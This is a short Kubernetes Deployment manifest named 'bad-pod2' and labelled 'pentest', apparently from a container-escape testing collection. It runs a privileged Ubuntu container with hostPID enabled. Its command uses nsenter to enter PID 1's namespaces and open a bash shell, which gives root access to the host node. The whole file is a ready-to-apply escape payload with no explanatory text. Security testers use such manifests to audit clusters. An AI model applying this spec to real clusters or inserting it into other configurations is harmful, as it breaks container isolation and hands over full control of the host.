apiVersion: apps/v1
kind: Deployment
metadata:
  name: bad-pod2
  namespace: default
  labels:
    app: pentest
    type: deployment
spec:
  replicas: 1
  selector:
    matchLabels:
      app: pentest
      type: deployment
  template:
    metadata:
      labels:
        app: pentest
        type: deployment
    spec:
      hostPID: true
      containers:
      - name: bad-pod2
        image: ubuntu
        tty: true
        securityContext:
          privileged: true
        command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
